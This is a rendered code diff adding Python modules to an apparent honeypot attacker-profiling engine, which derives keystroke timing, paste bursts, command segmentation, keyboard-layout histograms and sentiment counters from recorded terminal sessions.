# emit; calibration grid honest). The ``-pre`` suffix stays until
|
||||||
|
# ``BEHAVE-INTEGRATION.md`` Phase 4 lands the worker wiring + observations
|
||||||
|
# table writes + AttackerDetail panel; only then does H.5 proper drop the
|
||||||
|
# suffix and tag v0.
|
||||||
|
__version__ = "0.1.0-pre"
|
||||||
|
|
||||||
|
__all__ = ["DEFAULT_SOURCE", "build_context", "extract_session", "__version__"]
|
||||||
573
decnet/profiler/behave_shell/_ctx.py
Normal file
573
decnet/profiler/behave_shell/_ctx.py
Normal file
@@ -0,0 +1,573 @@
|
|||||||
|
"""SessionContext: precomputed bundle every feature function reads from.
|
||||||
|
|
||||||
|
A naïve engine re-walks the event stream once per primitive. We don't
|
||||||
|
do that — one walk over the events builds this context, every feature
|
||||||
|
reads from it. Adding a new feature is O(1) cost on the parse side.
|
||||||
|
|
||||||
|
Step 1 fills ``iats`` (inter-key intervals between input events) and
|
||||||
|
``paste_bursts`` (contiguous runs of paste-class events). Step 4
|
||||||
|
will fill ``commands`` / ``inter_cmd_iats`` / ``output_per_cmd``.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import math
|
||||||
|
from dataclasses import dataclass, field
|
||||||
|
from typing import Iterable, Mapping
|
||||||
|
|
||||||
|
from decnet.profiler.behave_shell._intent import (
|
||||||
|
LEXEME_MAX_LEN,
|
||||||
|
NEGATIVE_LEXEMES,
|
||||||
|
OBSCENITY_LEXEMES,
|
||||||
|
POSITIVE_LEXEMES,
|
||||||
|
)
|
||||||
|
from decnet.profiler.behave_shell._parse import (
|
||||||
|
AsciinemaEvent,
|
||||||
|
Command,
|
||||||
|
PasteBurst,
|
||||||
|
PromptLine,
|
||||||
|
detect_error_in_output,
|
||||||
|
extract_prompt_lines,
|
||||||
|
hash_token,
|
||||||
|
strip_ansi,
|
||||||
|
)
|
||||||
|
from decnet.profiler.behave_shell._thresholds import (
|
||||||
|
IKI_THINK_MAX_S,
|
||||||
|
LAYOUT_BIGRAM_TOP_N,
|
||||||
|
PASTE_BURST_MAX_IAT_S,
|
||||||
|
PASTE_MIN_CHARS_PER_EVENT,
|
||||||
|
PROMPT_LINE_MAX_CHARS,
|
||||||
|
SHORTCUT_CTRL_BYTES,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
@dataclass(frozen=True, slots=True)
|
||||||
|
class _LexCounters:
|
||||||
|
"""Lexical counters from the typed-text walk (G.0).
|
||||||
|
|
||||||
|
Internal to the ctx-builder; flattened onto SessionContext fields
|
||||||
|
in :func:`build_session_context`.
|
||||||
|
"""
|
||||||
|
obscenity_hits: int = 0
|
||||||
|
positive_lex_hits: int = 0
|
||||||
|
negative_lex_hits: int = 0
|
||||||
|
caps_run_max: int = 0
|
||||||
|
bang_run_max: int = 0
|
||||||
|
|
||||||
|
|
||||||
|
@dataclass(frozen=True, slots=True)
|
||||||
|
class SessionContext:
|
||||||
|
sid: str
|
||||||
|
source: str
|
||||||
|
evidence_ref: str
|
||||||
|
t_start: float
|
||||||
|
t_end: float
|
||||||
|
duration_s: float
|
||||||
|
|
||||||
|
input_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
|
||||||
|
output_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
|
||||||
|
|
||||||
|
# Step 1 derivations
|
||||||
|
iats: tuple[float, ...] = field(default_factory=tuple)
|
||||||
|
paste_bursts: tuple[PasteBurst, ...] = field(default_factory=tuple)
|
||||||
|
paste_event_count: int = 0
|
||||||
|
|
||||||
|
# Step 4 derivations — command segmentation
|
||||||
|
commands: tuple[Command, ...] = field(default_factory=tuple)
|
||||||
|
inter_cmd_iats: tuple[float, ...] = field(default_factory=tuple)
|
||||||
|
output_per_cmd: tuple[int, ...] = field(default_factory=tuple)
|
||||||
|
|
||||||
|
# Step B.1 derivations — typing bursts (IATs split at think-pauses)
|
||||||
|
typing_bursts: tuple[tuple[float, ...], ...] = field(default_factory=tuple)
|
||||||
|
|
||||||
|
# Step B.3 derivations — error-correction signals
|
||||||
|
backspace_count: int = 0
|
||||||
|
backspace_iats: tuple[float, ...] = field(default_factory=tuple)
|
||||||
|
kill_line_count: int = 0
|
||||||
|
|
||||||
|
# Step B.4 derivations — per-command intra-typing IATs
|
||||||
|
intra_command_iats: tuple[tuple[float, ...], ...] = field(default_factory=tuple)
|
||||||
|
|
||||||
|
# Step F.0 derivations — PS1 prompt lines detected in the output stream
|
||||||
|
prompt_lines: tuple[PromptLine, ...] = field(default_factory=tuple)
|
||||||
|
|
||||||
|
# Step F.4 derivations — typed-only character histograms for keyboard
|
||||||
|
# layout fingerprinting (PII boundary lifted by ANTI for Phase F).
|
||||||
|
typed_unigram_counts: Mapping[str, int] = field(default_factory=dict)
|
||||||
|
typed_bigram_counts: Mapping[str, int] = field(default_factory=dict)
|
||||||
|
typed_letter_count: int = 0
|
||||||
|
|
||||||
|
# Step G.0 derivations — lexical counters from the same single-pass
|
||||||
|
# typed-text walk. No raw text retained; only fixed-vocabulary
|
||||||
|
# membership counts and run-lengths. Drives valence (G.5), arousal
|
||||||
|
# (G.6), and frustration_venting (G.8).
|
||||||
|
obscenity_hits: int = 0
|
||||||
|
positive_lex_hits: int = 0
|
||||||
|
negative_lex_hits: int = 0
|
||||||
|
caps_run_max: int = 0
|
||||||
|
bang_run_max: int = 0
|
||||||
|
|
||||||
|
|
||||||
|
def _detect_paste_bursts(
|
||||||
|
inputs: list[AsciinemaEvent],
|
||||||
|
) -> tuple[tuple[PasteBurst, ...], int]:
|
||||||
|
"""Group consecutive paste-class input events into PasteBursts.
|
||||||
|
|
||||||
|
A paste-class event is one with ``len(data) >= PASTE_MIN_CHARS_PER_EVENT``.
|
||||||
|
Two adjacent paste-class events collapse into the same burst when
|
||||||
|
their IAT is within ``PASTE_BURST_MAX_IAT_S``; otherwise a new
|
||||||
|
burst opens. Returns the bursts and the total count of paste-class
|
||||||
|
events (the same number ``BEHAVE`` prototype calls ``paste_events``).
|
||||||
|
"""
|
||||||
|
bursts: list[PasteBurst] = []
|
||||||
|
paste_count = 0
|
||||||
|
|
||||||
|
cur_start: float | None = None
|
||||||
|
cur_end: float = 0.0
|
||||||
|
cur_chars: int = 0
|
||||||
|
cur_events: int = 0
|
||||||
|
last_t: float | None = None
|
||||||
|
|
||||||
|
def _close() -> None:
|
||||||
|
nonlocal cur_start, cur_end, cur_chars, cur_events
|
||||||
|
if cur_start is not None and cur_events > 0:
|
||||||
|
bursts.append(PasteBurst(
|
||||||
|
start_ts=cur_start,
|
||||||
|
end_ts=cur_end,
|
||||||
|
char_count=cur_chars,
|
||||||
|
event_count=cur_events,
|
||||||
|
))
|
||||||
|
cur_start = None
|
||||||
|
cur_end = 0.0
|
||||||
|
cur_chars = 0
|
||||||
|
cur_events = 0
|
||||||
|
|
||||||
|
for t, _kind, data in inputs:
|
||||||
|
is_paste = len(data) >= PASTE_MIN_CHARS_PER_EVENT
|
||||||
|
if is_paste:
|
||||||
|
paste_count += 1
|
||||||
|
if cur_start is None or (
|
||||||
|
last_t is not None and (t - last_t) > PASTE_BURST_MAX_IAT_S
|
||||||
|
):
|
||||||
|
_close()
|
||||||
|
cur_start = t
|
||||||
|
cur_end = t
|
||||||
|
cur_chars += len(data)
|
||||||
|
cur_events += 1
|
||||||
|
else:
|
||||||
|
_close()
|
||||||
|
last_t = t
|
||||||
|
|
||||||
|
_close()
|
||||||
|
return tuple(bursts), paste_count
|
||||||
|
|
||||||
|
|
||||||
|
_BACKSPACE_CHARS = ("\x7f", "\x08")
|
||||||
|
_KILL_LINE_CHARS = ("\x15", "\x17")
|
||||||
|
|
||||||
|
|
||||||
|
def _scan_correction_signals(
|
||||||
|
inputs: list[AsciinemaEvent],
|
||||||
|
) -> tuple[int, tuple[float, ...], int]:
|
||||||
|
"""Walk input events char-by-char, count backspaces / kill-lines /
|
||||||
|
timing IATs.
|
||||||
|
|
||||||
|
PII discipline: only counts and IATs leave this function — no
|
||||||
|
character data is retained or returned.
|
||||||
|
"""
|
||||||
|
backspace_count = 0
|
||||||
|
kill_line_count = 0
|
||||||
|
iats: list[float] = []
|
||||||
|
last_non_bs_t: float | None = None
|
||||||
|
for t, _kind, data in inputs:
|
||||||
|
for c in data:
|
||||||
|
if c in _BACKSPACE_CHARS:
|
||||||
|
backspace_count += 1
|
||||||
|
if last_non_bs_t is not None:
|
||||||
|
iats.append(max(0.0, t - last_non_bs_t))
|
||||||
|
elif c in _KILL_LINE_CHARS:
|
||||||
|
kill_line_count += 1
|
||||||
|
last_non_bs_t = t
|
||||||
|
else:
|
||||||
|
last_non_bs_t = t
|
||||||
|
return backspace_count, tuple(iats), kill_line_count
|
||||||
|
|
||||||
|
|
||||||
|
def _split_typing_bursts(iats: tuple[float, ...]) -> tuple[tuple[float, ...], ...]:
|
||||||
|
"""Split a flat IAT sequence at gaps > IKI_THINK_MAX_S.
|
||||||
|
|
||||||
|
Drops bursts of fewer than 3 IATs — too short to compute a stable
|
||||||
|
CV. Mirrors BEHAVE prototype's ``_split_into_bursts``.
|
||||||
|
"""
|
||||||
|
bursts: list[list[float]] = [[]]
|
||||||
|
for x in iats:
|
||||||
|
if x > IKI_THINK_MAX_S:
|
||||||
|
if bursts[-1]:
|
||||||
|
bursts.append([])
|
||||||
|
else:
|
||||||
|
bursts[-1].append(x)
|
||||||
|
return tuple(tuple(b) for b in bursts if len(b) >= 3)
|
||||||
|
|
||||||
|
|
||||||
|
def _segment_commands(inputs: list[AsciinemaEvent]) -> tuple[Command, ...]:
|
||||||
|
"""Walk input events, splitting on ``\\r`` / ``\\n`` into commands.
|
||||||
|
|
||||||
|
Retains only the first whitespace-delimited token as a sha256 hash
|
||||||
|
plus three integer counters needed for the Phase C
|
||||||
|
``motor.shell_mastery.*`` primitives:
|
||||||
|
|
||||||
|
* ``tab_count`` — ``\\t`` (0x09) keystrokes in the command
|
||||||
|
* ``shortcut_count`` — readline control bytes from
|
||||||
|
:data:`SHORTCUT_CTRL_BYTES`
|
||||||
|
* ``pipe_count`` — ``|`` characters in the command (counted on
|
||||||
|
every byte; pasted pipelines still indicate pipeline fluency the
|
||||||
|
operator chose to execute)
|
||||||
|
|
||||||
|
Buffer contents are dropped on every command boundary; an
|
||||||
|
unterminated trailing buffer (no final newline) yields no command.
|
||||||
|
"""
|
||||||
|
cmds: list[Command] = []
|
||||||
|
buf_chars: list[str] = []
|
||||||
|
buf_start_ts: float | None = None
|
||||||
|
tab_count = 0
|
||||||
|
shortcut_count = 0
|
||||||
|
pipe_count = 0
|
||||||
|
|
||||||
|
for t, _kind, data in inputs:
|
||||||
|
for c in data:
|
||||||
|
if c in ("\r", "\n"):
|
||||||
|
if buf_chars:
|
||||||
|
text = "".join(buf_chars).strip()
|
||||||
|
first_token = text.split(maxsplit=1)[0] if text else ""
|
||||||
|
cmds.append(Command(
|
||||||
|
start_ts=buf_start_ts if buf_start_ts is not None else t,
|
||||||
|
end_ts=t,
|
||||||
|
first_token_hash=hash_token(first_token),
|
||||||
|
tab_count=tab_count,
|
||||||
|
shortcut_count=shortcut_count,
|
||||||
|
pipe_count=pipe_count,
|
||||||
|
))
|
||||||
|
buf_chars = []
|
||||||
|
buf_start_ts = None
|
||||||
|
tab_count = 0
|
||||||
|
shortcut_count = 0
|
||||||
|
pipe_count = 0
|
||||||
|
else:
|
||||||
|
if not buf_chars:
|
||||||
|
buf_start_ts = t
|
||||||
|
buf_chars.append(c)
|
||||||
|
if c == "\t":
|
||||||
|
tab_count += 1
|
||||||
|
elif c == "|":
|
||||||
|
pipe_count += 1
|
||||||
|
elif c in SHORTCUT_CTRL_BYTES:
|
||||||
|
shortcut_count += 1
|
||||||
|
|
||||||
|
return tuple(cmds)
|
||||||
|
|
||||||
|
|
||||||
|
def _annotate_commands_with_output(
|
||||||
|
commands: tuple[Command, ...],
|
||||||
|
outputs: list[AsciinemaEvent],
|
||||||
|
) -> tuple[tuple[Command, ...], tuple[PromptLine, ...]]:
|
||||||
|
"""Re-emit ``commands`` with output-derived fields filled.
|
||||||
|
|
||||||
|
Returns ``(commands, prompt_lines)``. Each ``Command`` gains
|
||||||
|
``errored``, ``output_bytes``, and ``followed_by_prompt`` (Step
|
||||||
|
F.0). The flattened tuple of all detected ``PromptLine`` instances
|
||||||
|
across every command's window is returned alongside for the caller
|
||||||
|
to install on ``SessionContext.prompt_lines``.
|
||||||
|
|
||||||
|
The output window for ``commands[i]`` spans from its ``end_ts``
|
||||||
|
(the ``\\r``/``\\n`` that ran it) to the ``start_ts`` of the next
|
||||||
|
command. The last command's window is open-ended (``math.inf``)
|
||||||
|
so output events arriving at or after ``t_end`` are still captured.
|
||||||
|
"""
|
||||||
|
if not commands:
|
||||||
|
return commands, ()
|
||||||
|
annotated: list[Command] = []
|
||||||
|
all_prompts: list[PromptLine] = []
|
||||||
|
for i, cmd in enumerate(commands):
|
||||||
|
win_end = commands[i + 1].start_ts if i + 1 < len(commands) else math.inf
|
||||||
|
byte_count, errored, prompts = _output_window(outputs, cmd.end_ts, win_end)
|
||||||
|
all_prompts.extend(prompts)
|
||||||
|
annotated.append(Command(
|
||||||
|
start_ts=cmd.start_ts,
|
||||||
|
end_ts=cmd.end_ts,
|
||||||
|
first_token_hash=cmd.first_token_hash,
|
||||||
|
tab_count=cmd.tab_count,
|
||||||
|
shortcut_count=cmd.shortcut_count,
|
||||||
|
pipe_count=cmd.pipe_count,
|
||||||
|
errored=errored,
|
||||||
|
output_bytes=byte_count,
|
||||||
|
followed_by_prompt=bool(prompts),
|
||||||
|
))
|
||||||
|
return tuple(annotated), tuple(all_prompts)
|
||||||
|
|
||||||
|
|
||||||
|
def _per_command_iats(
|
||||||
|
commands: tuple[Command, ...],
|
||||||
|
inputs: list[AsciinemaEvent],
|
||||||
|
) -> tuple[tuple[float, ...], ...]:
|
||||||
|
"""Per-command IATs between consecutive input events whose
|
||||||
|
timestamps fall in ``[cmd.start_ts, cmd.end_ts)``.
|
||||||
|
|
||||||
|
Excludes the terminator IAT (the last event at ``cmd.end_ts`` is
|
||||||
|
the ``\\r``/``\\n`` itself). Returns one tuple per command.
|
||||||
|
"""
|
||||||
|
out: list[tuple[float, ...]] = []
|
||||||
|
for cmd in commands:
|
||||||
|
prev_t: float | None = None
|
||||||
|
cmd_iats: list[float] = []
|
||||||
|
for t, _kind, _data in inputs:
|
||||||
|
if t < cmd.start_ts or t >= cmd.end_ts:
|
||||||
|
continue
|
||||||
|
if prev_t is not None:
|
||||||
|
cmd_iats.append(max(0.0, t - prev_t))
|
||||||
|
prev_t = t
|
||||||
|
out.append(tuple(cmd_iats))
|
||||||
|
return tuple(out)
|
||||||
|
|
||||||
|
|
||||||
|
def _output_bytes_between(
|
||||||
|
outputs: list[AsciinemaEvent],
|
||||||
|
start: float,
|
||||||
|
end: float,
|
||||||
|
) -> int:
|
||||||
|
"""Total ``len(d)`` of output events with ``start <= t < end``."""
|
||||||
|
return sum(len(d) for t, _k, d in outputs if start <= t < end)
|
||||||
|
|
||||||
|
|
||||||
|
def _typed_char_histograms(
|
||||||
|
inputs: list[AsciinemaEvent],
|
||||||
|
) -> tuple[Mapping[str, int], Mapping[str, int], int, _LexCounters]:
|
||||||
|
"""Walk input events, build typed-only unigram + bigram histograms
|
||||||
|
plus the Phase G lexical counters.
|
||||||
|
|
||||||
|
Skip paste-class events (``len(data) >= PASTE_MIN_CHARS_PER_EVENT``)
|
||||||
|
— pasted text reveals nothing about the operator's keyboard or
|
||||||
|
sentiment. Letter bigrams chain only across consecutive ASCII-letter
|
||||||
|
chars; a digit or punctuation character breaks the chain.
|
||||||
|
|
||||||
|
Lexical counters (G.0): a small word buffer (≤ ``LEXEME_MAX_LEN``)
|
||||||
|
accumulates ASCII-letter chars (case-folded). On any non-letter
|
||||||
|
boundary, every suffix of the buffer is checked against
|
||||||
|
``POSITIVE_LEXEMES`` / ``NEGATIVE_LEXEMES`` / ``OBSCENITY_LEXEMES``;
|
||||||
|
the longest match wins (so ``fucking`` counts as one obscenity hit,
|
||||||
|
not two — ``fuck`` + ``fucking``). Caps and bang runs are tracked
|
||||||
|
in the same walk.
|
||||||
|
|
||||||
|
Returns ``(unigrams, bigrams, total_letters, lex_counters)``.
|
||||||
|
"""
|
||||||
|
unigrams: dict[str, int] = {}
|
||||||
|
bigrams: dict[str, int] = {}
|
||||||
|
total_letters = 0
|
||||||
|
last_letter: str | None = None
|
||||||
|
|
||||||
|
word_buf: list[str] = []
|
||||||
|
obscenity_hits = 0
|
||||||
|
positive_lex_hits = 0
|
||||||
|
negative_lex_hits = 0
|
||||||
|
caps_run_cur = 0
|
||||||
|
caps_run_max = 0
|
||||||
|
bang_run_cur = 0
|
||||||
|
bang_run_max = 0
|
||||||
|
|
||||||
|
def _flush_word() -> tuple[int, int, int]:
|
||||||
|
"""Match longest lexeme suffix in ``word_buf``; return per-set deltas."""
|
||||||
|
if not word_buf:
|
||||||
|
return 0, 0, 0
|
||||||
|
s = "".join(word_buf)
|
||||||
|
# Longest-suffix scan against fixed lexicons.
|
||||||
|
for length in range(min(len(s), LEXEME_MAX_LEN), 0, -1):
|
||||||
|
suffix = s[-length:]
|
||||||
|
if suffix in OBSCENITY_LEXEMES:
|
||||||
|
return 1, 0, 0
|
||||||
|
if suffix in POSITIVE_LEXEMES:
|
||||||
|
return 0, 1, 0
|
||||||
|
if suffix in NEGATIVE_LEXEMES:
|
||||||
|
return 0, 0, 1
|
||||||
|
return 0, 0, 0
|
||||||
|
|
||||||
|
for _t, _kind, data in inputs:
|
||||||
|
if len(data) >= PASTE_MIN_CHARS_PER_EVENT:
|
||||||
|
# Paste boundary breaks every running counter.
|
||||||
|
last_letter = None
|
||||||
|
obs_d, pos_d, neg_d = _flush_word()
|
||||||
|
obscenity_hits += obs_d
|
||||||
|
positive_lex_hits += pos_d
|
||||||
|
negative_lex_hits += neg_d
|
||||||
|
word_buf.clear()
|
||||||
|
caps_run_cur = 0
|
||||||
|
bang_run_cur = 0
|
||||||
|
continue
|
||||||
|
for c in data:
|
||||||
|
# Caps-run tracking
|
||||||
|
if c.isascii() and c.isupper():
|
||||||
|
caps_run_cur += 1
|
||||||
|
if caps_run_cur > caps_run_max:
|
||||||
|
caps_run_max = caps_run_cur
|
||||||
|
else:
|
||||||
|
caps_run_cur = 0
|
||||||
|
# Bang-run tracking
|
||||||
|
if c == "!":
|
||||||
|
bang_run_cur += 1
|
||||||
|
if bang_run_cur > bang_run_max:
|
||||||
|
bang_run_max = bang_run_cur
|
||||||
|
else:
|
||||||
|
bang_run_cur = 0
|
||||||
|
# Histogram + lexeme buffering
|
||||||
|
if c.isascii() and c.isalpha():
|
||||||
|
lower = c.lower()
|
||||||
|
unigrams[lower] = unigrams.get(lower, 0) + 1
|
||||||
|
total_letters += 1
|
||||||
|
if last_letter is not None:
|
||||||
|
big = last_letter + lower
|
||||||
|
bigrams[big] = bigrams.get(big, 0) + 1
|
||||||
|
last_letter = lower
|
||||||
|
word_buf.append(lower)
|
||||||
|
if len(word_buf) > LEXEME_MAX_LEN:
|
||||||
|
# Slide window — only the tail can match a lexeme.
|
||||||
|
word_buf[:] = word_buf[-LEXEME_MAX_LEN:]
|
||||||
|
else:
|
||||||
|
last_letter = None
|
||||||
|
obs_d, pos_d, neg_d = _flush_word()
|
||||||
|
obscenity_hits += obs_d
|
||||||
|
positive_lex_hits += pos_d
|
||||||
|
negative_lex_hits += neg_d
|
||||||
|
word_buf.clear()
|
||||||
|
|
||||||
|
# Trailing word (no boundary at end of input).
|
||||||
|
obs_d, pos_d, neg_d = _flush_word()
|
||||||
|
obscenity_hits += obs_d
|
||||||
|
positive_lex_hits += pos_d
|
||||||
|
negative_lex_hits += neg_d
|
||||||
|
|
||||||
|
if len(bigrams) > LAYOUT_BIGRAM_TOP_N:
|
||||||
|
top = sorted(bigrams.items(), key=lambda kv: -kv[1])[:LAYOUT_BIGRAM_TOP_N]
|
||||||
|
bigrams = dict(top)
|
||||||
|
return unigrams, bigrams, total_letters, _LexCounters(
|
||||||
|
obscenity_hits=obscenity_hits,
|
||||||
|
positive_lex_hits=positive_lex_hits,
|
||||||
|
negative_lex_hits=negative_lex_hits,
|
||||||
|
caps_run_max=caps_run_max,
|
||||||
|
bang_run_max=bang_run_max,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _output_window(
|
||||||
|
outputs: list[AsciinemaEvent],
|
||||||
|
start: float,
|
||||||
|
end: float,
|
||||||
|
) -> tuple[int, bool, tuple[PromptLine, ...]]:
|
||||||
|
"""Walk output events in ``[start, end)`` once.
|
||||||
|
|
||||||
|
Returns ``(byte_count, errored, prompt_lines)``. ``byte_count`` is
|
||||||
|
the raw byte count (pre-strip); ``errored`` is the canonical-error
|
||||||
|
-pattern match over the ANSI-stripped concatenation;
|
||||||
|
``prompt_lines`` is the tuple of PS1 lines detected in the same
|
||||||
|
stripped text (Step F.0).
|
||||||
|
|
||||||
|
PII trade-off (Phase F): the stripped text itself is dropped on
|
||||||
|
return, but ``prompt_lines`` retains PS1 strings (capped at
|
||||||
|
``PROMPT_LINE_MAX_CHARS``). Only derived values leave the engine
|
||||||
|
via observations; the prompt strings live on ``SessionContext``
|
||||||
|
so F.1 / F.3 / E.4 can read them.
|
||||||
|
"""
|
||||||
|
chunks: list[str] = []
|
||||||
|
last_ts = start
|
||||||
|
byte_count = 0
|
||||||
|
for t, _k, d in outputs:
|
||||||
|
if start <= t < end:
|
||||||
|
byte_count += len(d)
|
||||||
|
chunks.append(d)
|
||||||
|
last_ts = t
|
||||||
|
if not chunks:
|
||||||
|
return 0, False, ()
|
||||||
|
stripped = strip_ansi("".join(chunks))
|
||||||
|
errored = detect_error_in_output(stripped)
|
||||||
|
prompts = tuple(extract_prompt_lines(
|
||||||
|
stripped, base_ts=last_ts, max_chars=PROMPT_LINE_MAX_CHARS,
|
||||||
|
))
|
||||||
|
return byte_count, errored, prompts
|
||||||
|
|
||||||
|
|
||||||
|
def build_session_context(
|
||||||
|
events: Iterable[AsciinemaEvent],
|
||||||
|
*,
|
||||||
|
sid: str,
|
||||||
|
source: str,
|
||||||
|
evidence_ref: str | None = None,
|
||||||
|
) -> SessionContext:
|
||||||
|
"""Single-pass build of the SessionContext for ``events``."""
|
||||||
|
inputs: list[AsciinemaEvent] = []
|
||||||
|
outputs: list[AsciinemaEvent] = []
|
||||||
|
t_first: float | None = None
|
||||||
|
t_last: float = 0.0
|
||||||
|
|
||||||
|
for ev in events:
|
||||||
|
t, kind, _ = ev
|
||||||
|
if t_first is None:
|
||||||
|
t_first = t
|
||||||
|
if t > t_last:
|
||||||
|
t_last = t
|
||||||
|
if kind == "i":
|
||||||
|
inputs.append(ev)
|
||||||
|
elif kind == "o":
|
||||||
|
outputs.append(ev)
|
||||||
|
|
||||||
|
if t_first is None:
|
||||||
|
t_start = 0.0
|
||||||
|
t_end = 0.0
|
||||||
|
else:
|
||||||
|
t_start = t_first
|
||||||
|
t_end = t_last
|
||||||
|
|
||||||
|
iats: tuple[float, ...] = tuple(
|
||||||
|
max(0.0, inputs[i][0] - inputs[i - 1][0]) for i in range(1, len(inputs))
|
||||||
|
)
|
||||||
|
paste_bursts, paste_count = _detect_paste_bursts(inputs)
|
||||||
|
typing_bursts = _split_typing_bursts(iats)
|
||||||
|
backspace_count, backspace_iats, kill_line_count = _scan_correction_signals(inputs)
|
||||||
|
commands = _segment_commands(inputs)
|
||||||
|
commands, prompt_lines = _annotate_commands_with_output(commands, outputs)
|
||||||
|
inter_cmd_iats = tuple(
|
||||||
|
max(0.0, commands[i + 1].start_ts - commands[i].end_ts)
|
||||||
|
for i in range(len(commands) - 1)
|
||||||
|
)
|
||||||
|
output_per_cmd = tuple(
|
||||||
|
_output_bytes_between(outputs, commands[i].end_ts, commands[i + 1].start_ts)
|
||||||
|
for i in range(len(commands) - 1)
|
||||||
|
)
|
||||||
|
intra_command_iats = _per_command_iats(commands, inputs)
|
||||||
|
typed_uni, typed_bi, typed_letters, lex = _typed_char_histograms(inputs)
|
||||||
|
|
||||||
|
return SessionContext(
|
||||||
|
sid=sid,
|
||||||
|
source=source,
|
||||||
|
evidence_ref=evidence_ref or f"session:{sid}",
|
||||||
|
t_start=t_start,
|
||||||
|
t_end=t_end,
|
||||||
|
duration_s=max(0.0, t_end - t_start),
|
||||||
|
input_events=tuple(inputs),
|
||||||
|
output_events=tuple(outputs),
|
||||||
|
iats=iats,
|
||||||
|
paste_bursts=paste_bursts,
|
||||||
|
paste_event_count=paste_count,
|
||||||
|
commands=commands,
|
||||||
|
inter_cmd_iats=inter_cmd_iats,
|
||||||
|
output_per_cmd=output_per_cmd,
|
||||||
|
typing_bursts=typing_bursts,
|
||||||
|
backspace_count=backspace_count,
|
||||||
|
backspace_iats=backspace_iats,
|
||||||
|
kill_line_count=kill_line_count,
|
||||||
|
intra_command_iats=intra_command_iats,
|
||||||
|
prompt_lines=prompt_lines,
|
||||||
|
typed_unigram_counts=typed_uni,
|
||||||
|
typed_bigram_counts=typed_bi,
|
||||||
|
typed_letter_count=typed_letters,
|
||||||
|
obscenity_hits=lex.obscenity_hits,
|
||||||
|
positive_lex_hits=lex.positive_lex_hits,
|
||||||
|
negative_lex_hits=lex.negative_lex_hits,
|
||||||
|
caps_run_max=lex.caps_run_max,
|
||||||
|
bang_run_max=lex.bang_run_max,
|
||||||
|
)
|
||||||
104
decnet/profiler/behave_shell/_features/__init__.py
Normal file
104
decnet/profiler/behave_shell/_features/__init__.py
Normal file
@@ -0,0 +1,104 @@
|
|||||||
|
"""Registered feature functions.
|
||||||
|
|
||||||
|
Each entry takes a ``SessionContext`` and yields zero or more
|
||||||
|
``Observation`` instances. Adding a primitive = adding a function in a
|
||||||
|
sibling module and appending it to ``FEATURES``.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from typing import Callable, Iterable
|
||||||
|
|
||||||
|
from behave_core.spec.envelope import Observation
|
||||||
|
|
||||||
|
from decnet.profiler.behave_shell._ctx import SessionContext
|
||||||
|
from decnet.profiler.behave_shell._features.cognitive import (
|
||||||
|
cognitive_load,
|
||||||
|
command_branch_diversity,
|
||||||
|
error_resilience_fallback_to_man,
|
||||||
|
error_resilience_frustration_typing,
|
||||||
|
error_resilience_retry_tactic,
|
||||||
|
exploration_style,
|
||||||
|
feedback_loop_engagement,
|
||||||
|
planning_depth,
|
||||||
|
tool_vocabulary,
|
||||||
|
inter_command_consistency,
|
||||||
|
inter_command_latency_class,
|
||||||
|
)
|
||||||
|
from decnet.profiler.behave_shell._features.emotional_valence import (
|
||||||
|
arousal,
|
||||||
|
frustration_venting,
|
||||||
|
stress_response,
|
||||||
|
valence,
|
||||||
|
)
|
||||||
|
from decnet.profiler.behave_shell._features.environmental import (
|
||||||
|
keyboard_layout,
|
||||||
|
locale,
|
||||||
|
numpad_usage,
|
||||||
|
shell_type,
|
||||||
|
terminal_multiplexer,
|
||||||
|
)
|
||||||
|
from decnet.profiler.behave_shell._features.operational import (
|
||||||
|
cleanup_behavior,
|
||||||
|
multi_actor_indicators,
|
||||||
|
objective,
|
||||||
|
opsec_discipline,
|
||||||
|
)
|
||||||
|
from decnet.profiler.behave_shell._features.temporal import (
|
||||||
|
escalation_pattern,
|
||||||
|
exit_behavior,
|
||||||
|
landing_ritual,
|
||||||
|
session_duration,
|
||||||
|
)
|
||||||
|
from decnet.profiler.behave_shell._features.motor import (
|
||||||
|
command_chunking,
|
||||||
|
error_correction,
|
||||||
|
input_modality,
|
||||||
|
keystroke_cadence,
|
||||||
|
motor_stability,
|
||||||
|
paste_burst_rate,
|
||||||
|
pipe_chaining_depth,
|
||||||
|
shortcut_usage,
|
||||||
|
tab_completion,
|
||||||
|
)
|
||||||
|
|
||||||
|
FeatureFn = Callable[[SessionContext], Iterable[Observation]]
|
||||||
|
|
||||||
|
FEATURES: tuple[FeatureFn, ...] = (
|
||||||
|
input_modality,
|
||||||
|
paste_burst_rate,
|
||||||
|
keystroke_cadence,
|
||||||
|
motor_stability,
|
||||||
|
error_correction,
|
||||||
|
command_chunking,
|
||||||
|
tab_completion,
|
||||||
|
shortcut_usage,
|
||||||
|
pipe_chaining_depth,
|
||||||
|
inter_command_latency_class,
|
||||||
|
command_branch_diversity,
|
||||||
|
feedback_loop_engagement,
|
||||||
|
inter_command_consistency,
|
||||||
|
cognitive_load,
|
||||||
|
exploration_style,
|
||||||
|
planning_depth,
|
||||||
|
tool_vocabulary,
|
||||||
|
error_resilience_retry_tactic,
|
||||||
|
error_resilience_frustration_typing,
|
||||||
|
error_resilience_fallback_to_man,
|
||||||
|
session_duration,
|
||||||
|
escalation_pattern,
|
||||||
|
landing_ritual,
|
||||||
|
exit_behavior,
|
||||||
|
shell_type,
|
||||||
|
terminal_multiplexer,
|
||||||
|
locale,
|
||||||
|
keyboard_layout,
|
||||||
|
numpad_usage,
|
||||||
|
objective,
|
||||||
|
opsec_discipline,
|
||||||
|
cleanup_behavior,
|
||||||
|
multi_actor_indicators,
|
||||||
|
valence,
|
||||||
|
arousal,
|
||||||
|
stress_response,
|
||||||
|
frustration_venting,
|
||||||
|
)
|
||||||
32
decnet/profiler/behave_shell/_features/_emit.py
Normal file
32
decnet/profiler/behave_shell/_features/_emit.py
Normal file
@@ -0,0 +1,32 @@
|
|||||||
|
"""Helper for building registry-valid :class:`Observation` records.
|
||||||
|
|
||||||
|
Every feature module would otherwise repeat the same Window /
|
||||||
|
source / evidence_ref boilerplate. This helper centralises it and is
|
||||||
|
the one place to reach when emission semantics change (e.g. when we
|
||||||
|
start parametrising windows on a per-primitive basis).
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from typing import Any
|
||||||
|
